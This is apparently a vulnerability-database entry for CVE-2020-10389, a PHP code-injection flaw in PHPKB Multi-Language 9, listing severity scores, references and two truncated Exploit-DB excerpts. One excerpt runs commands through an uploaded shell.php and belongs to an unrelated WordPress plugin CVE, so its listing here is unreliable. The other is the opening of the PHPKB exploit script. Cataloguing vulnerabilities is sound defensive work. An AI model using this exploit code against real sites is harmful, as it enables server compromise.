CVE-2020-10389
Published: 2020-03-12
Priority: P3 (51), high; CVSS 3.1 base score 7.2
Vector: AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Exploit: available (see the Exploit-DB entries below)
EPSS: 4.88% (91.0th percentile)
admin/save-settings.php in Chadha PHPKB Standard Multi-Language 9 allows remote attackers to achieve Code Execution by injecting PHP code into any POST parameter when saving global settings.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| chadhaajay | phpkb | — | — |
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 7.2 | HIGH | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P |
No detection rules found.
Exploit-DB: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
exploitdb · 2023-04-03 · CVSS 10.0 · CVE-2020-25213 [CRITICAL]
```python
#!/usr/bin/env
# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
# Date: [ 22-01-2023 ]
# Exploit Author: [BLY]
# Vendor Homepage: [https://wpscan.com/vulnerability/10389]
# Version: [ File Manager plugin 6.0-6.9]
# Tested on: [ Debian ]
# CVE : [ CVE-2020-25213 ]
import sys,signal,time,requests
from bs4 import BeautifulSoup
#from pprint import pprint

def handler(sig,frame):
    print ("[!]Saliendo")
    sys.exit(1)

signal.signal(signal.SIGINT,handler)

def commandexec(command):
    exec_url = url+"/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"
    params = {
        "cmd":command
    }
    r=requests.get(exec_url,params=params)
    soup = BeautifulSoup(r.text, 'html.parser')
    te
```
Exploit-DB: PHPKB Multi-Language 9 - Authenticated Remote Code Execution
exploitdb · 2020-03-16 · CVSS 7.2 · CVE-2020-10389 [HIGH]
```python
# Exploit Title: PHPKB Multi-Language 9 - Authenticated Remote Code Execution
# Google Dork: N/A
# Date: 2020-03-15
# Exploit Author: Antonio Cannito
# Vendor Homepage: https://www.knowledgebase-script.com/
# Software Link: https://www.knowledgebase-script.com/pricing.php
# Version: Multi-Language v9
# Tested on: Windows 8.1 / PHP 7.4.3
# CVE : CVE-2020-10389
#!/usr/bin/env python3
import argparse
import requests

# Parsing arguments
parser = argparse.ArgumentParser(description="Exploiting CVE-2020-10389 - Authenticated Remote Code Execution in Chadha PHPKB Standard Multi-Language 9 in admin/save-settings.php")
parser.add_argument("url", type=str, help="PHPKB's base path")
parser.add_argument("username", type=str, help="S
```
References

- http://antoniocannito.it/?p=137#rce2
- http://packetstormsecurity.com/files/156751/PHPKB-Multi-Language-9-Authenticated-Remote-Code-Execution.html
- https://antoniocannito.it/phpkb1#authenticated-remote-code-execution-cve-2020-10389
- https://www.exploit-db.com/exploits/48219